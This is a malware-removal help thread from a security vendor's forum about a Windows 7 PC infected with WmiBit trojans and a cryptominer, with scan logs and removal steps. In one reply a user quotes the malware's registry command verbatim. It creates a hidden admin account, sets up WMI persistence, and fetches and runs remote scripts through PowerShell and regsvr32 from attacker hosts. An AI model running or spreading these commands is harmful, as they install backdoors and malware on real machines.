Anmolrazdan #1 Posted January 9 Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 1/9/19 Scan Time: 7:14 PM Log File: ba76cfbf-1414-11e9-874f-089e01f95592.json -Software Information- Version: 3.6.1.2711 Components Version: 1.0.463 Update Package Version: 1.0.6913 License: Free -System Information- OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: Hp-PC\Hp -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 240782 Threats Detected: 29 Threats Quarantined: 29 Time Elapsed: 3 min, 12 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Disabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registry Key: 15 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa, Quarantined, [6047], [430789],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913 Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, Quarantined, [3703], [417164],1.0.6913 Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913 Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913 Registry Value: 6 Trojan.Agent.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [3703], [400553],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}|PATH, Quarantined, [6047], [430786],1.0.6913 Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}|PATH, Quarantined, [3703], [417161],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}|PATH, Quarantined, [6047], [430786],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}|PATH, Quarantined, [6047], [430791],1.0.6913 Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}|PATH, Quarantined, [6047], [430786],1.0.6913 Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 8 Trojan.Agent.BTMGen, C:\WINDOWS\TEMP\CONHOST.EXE, Quarantined, [6149], [217077],1.0.6913 Trojan.BitCoinMiner.WmiBit, C:\WINDOWS\DEBUG\LSMOSE.EXE, Quarantined, [6285], [430813],1.0.6913 Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA, Quarantined, [6047], [430789],1.0.6913 Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, Quarantined, [3703], [417164],1.0.6913 Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa1, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa2, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa3, Quarantined, [6047], [430784],1.0.6913 Trojan.Agent.E, C:\PROGRAM FILES\COMMON FILES\XPDOWN.DAT, Quarantined, [3710], [568219],1.0.6913 Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) Share this post Link to post Share on other sites
LDTate #2 Posted January 9 Hello and Please take your time. Windows 7 Restart your computer in Safe Mode. Using the F8 or F5 Method: Restart your computer. When the computer starts you will see your computer's hardware being listed. When you see this information start to gently tap the F8 key on your keyboard repeatedly until you are presented with the Windows 7 Advanced Boot Options select the Safe Mode With Networking Then press the enter key on your keyboard to boot into Windows 7 Safe Mode. When Windows starts you will be at a typical logon screen. Logon to your computer and Windows 7 will enter Safe mode. Open Malwarebytes (MBAM), make sure Scan For Rootkits is checked, run a new scan and Quarantine all. **Power Off** (shutdown, the pc. Wait a few minutes. Restart in Normal Mode, run a new scan and make sure it's gone Share this post Link to post Share on other sites
Anmolrazdan #3 Posted January 9 found some new virus during full scan, please help me Share this post Link to post Share on other sites
Anmolrazdan #4 Posted January 9 i did this but the virus appeared again Share this post Link to post Share on other sites
Anmolrazdan #5 Posted January 9 i quarantined and then deleted them Share this post Link to post Share on other sites
LDTate #6 Posted January 9 Did that take care of it? If not, do this. NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system. Download Malwarebytes Support Toolhttps://downloads.malwarebytes.com/file/mbst?src=Forums-Reply Once the file is downloaded, open your Downloads folder/location of the downloaded file Double-click mb-support-X.X.X.XXXX.exe to run the program You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent. Place a checkmark next to Accept License Agreement and click Next You will be presented with a page stating, "Get Started!" Click the Advanced tab Click the Gather Logs button A progress bar will appear and the program will proceed with getting logs from your computer Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK Please attach the file in your next reply. Share this post Link to post Share on other sites
Anmolrazdan #7 Posted January 9 i will do this and will soon messsage you Share this post Link to post Share on other sites
Anmolrazdan #8 Posted January 9 mbst-grab-results.zip Share this post Link to post Share on other sites
LDTate #9 Posted January 9 There's no need to message me as I get notified when you add a reply here. I have attached A file I need you to download and save it to the same place that you saved the FRST program This fix will include removing temp files and emptying the Recycle Bin. Download attached **fixlist.txt** and save it to same location where the FRST tool is located. NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work. Close all browsers before running. Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version. •Click the **Fix Button**. •If you receive a message that a reboot is required, please make sure you allow it to restart normally. •The tool will complete its run after restart. When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please attach the Fixlog.txt in your reply. Restart the pc and let me know how it's running now. fixlist.txt Share this post Link to post Share on other sites
Anmolrazdan #10 Posted January 9 can you give me an idea where it will be present, as i am having trouble finding it Share this post Link to post Share on other sites
Anmolrazdan #13 Posted January 9 new virus found after restart through threat scan virus new.txt Share this post Link to post Share on other sites
LDTate #14 Posted January 9 I need you to download and run this tool and ONLY select Repair WMI https://www.bleepingcomputer.com/download/windows-repair-all-in-one/ Share this post Link to post Share on other sites
Anmolrazdan #15 Posted January 9 i did it and restarted the computer, but after the restart malwarebytes was continuously prompting me about trojan, the prompt says site was blocked due to trojan Share this post Link to post Share on other sites
LDTate #16 Posted January 9 I need to see what is being blocked Open Malwarebytes > History > Application Logs Double Click the **Protection log** to open it On the lower left select **Export** > Export to Text Save as mbamscan and Save it to your desktop Attach the mbamscan text file in your next reply. Share this post Link to post Share on other sites
Anmolrazdan #17 Posted January 10 some of the sites which are being blocked trojan.txt trojan 2.txt trojan 3.txt trojan 4.txt trojan 5.txt trojan 6.txt trojan 7.txt Share this post Link to post Share on other sites
Anmolrazdan #18 Posted January 10 got a new virus again virus.txt Share this post Link to post Share on other sites
LDTate #19 Posted January 10 I need new logs Double-click mb-support-X.X.X.XXXX.exe to run the program You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent. Place a checkmark next to Accept License Agreement and click Next You will be presented with a page stating, "Get Started!" Click the Advanced tab Click the Gather Logs button A progress bar will appear and the program will proceed with getting logs from your computer Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK Please attach the file in your next reply. Share this post Link to post Share on other sites
Anmolrazdan #20 Posted January 11 the results and some files named system volume information and recycle bin folders are formed in lopcal disk, volume E, D, F mbst-grab-results.zip Share this post Link to post Share on other sites
LDTate #21 Posted January 11 I have attached A file I need you to download and save it to the same place that you saved the FRST program This fix will include removing temp files and emptying the Recycle Bin. Download attached **fixlist.txt** and save it to same location where the FRST tool is located. NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work. Close all browsers before running. Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version. •Click the **Fix Button**. •If you receive a message that a reboot is required, please make sure you allow it to restart normally. •The tool will complete its run after restart. When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please attach the Fixlog.txt in your reply. Restart the pc and let me know how it's running now. fixlist.txt Share this post Link to post Share on other sites
RootyRoot #22 Posted January 12 I've been having fun for days wrestling with this, myself. I still don't think I've got it all. First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG. In the StartUp tab, it keeps adding this; regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll The URL doesn't actually work, but I don't think that's the point. My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector virusus, etc.). My further theory is that they all work together to keep each other activated, and/or reinstall, if one of them gets removed. It disabled "Hibernate", and even the ability to turn it on. More importantly, it completely disabled my MalwareBytes from even running. I'd click it, and it would not even appear in TaskManager. Reinstalled it to a different directory, uninstalled all of them - nothing worked. Even MBAM Chameloen would not work. That's some impressive work. I tried a number of other anti-virus/anti-malware software, and the best I could get were "there are no more endpoints available from the endpoint mapper" errors. (Apparently, this has something to do with RPC, according to some scant research I've done. Powershell is also involved, even though I don't think I have powershell on this infected XP laptop. Perhaps there's something like it? I found this in my research;https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/ But I digress. Part of the merry-go-round were the following files that kept re-appearing; C:\WINDOWS\system32\max.exe C:\WINDOWS\system32\new.exe C:\WINDOWS\TEMP\conhost.exe and there was something in the C:\WINDOWS\inf directory. Merely deleting them didn't work. Out of a kind desperation, I made zero-byte files of the same file names, assuming (correctly, as it turns out) that the virus could/would not overwrite them. This was not the final solution, but at least seemed to stop part of the merry-go-round of re-installation of other viral components. At least I could, in Safe Mode, get some other anti-virus software to start to chip away at the other pieces. WMI (Windows Management Instrumentation) was another piece of this. I found this command somewhere in the registry. (Sorry I did not document where.) (Apologies for the language, but it's not mine.) cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="*****youmm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='*****youmm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="*****youmm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="*****youmm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="*****youmm3"", Consumer="CommandLineEventConsumer.Name="*****youmm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll Some of those URLs don't work, but many of the IP-based ones do. (Shame on the hosting company that allows them to continue to work!) This reminds me, part of the viruses create a new user named "admin$". Make sure not to log in using that. If it's the only option, reboot in SafeMode. It is my strong belief that these viruses loaded onto my computer via a website advertisement. Time for me to invest in ad-blocking software. I don't have a complete solution for you, since I'm not sure I've completely repaired my laptop, thus far - but at least I'm making progress. Ideally, some of what I've found so far can help someone more expert than myself try to tackle this. Share this post Link to post Share on other sites
RootyRoot #23 Posted January 12 By the way, "SFX:Agent-E" is involved in this all, somehow. There was some script somewhere I could not document the location of. Share this post Link to post Share on other sites
LDTate #24 Posted January 13 Did you run the fix I gave you? For the WMI. I need you to download and run this tool and ONLY select Repair WMI https://www.bleepingcomputer.com/download/windows-repair-all-in-one/ Share this post Link to post Share on other sites
AdvancedSetup #25 Posted February 27 Due to the lack of feedback, this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread. Thanks Share this post Link to post Share on other sites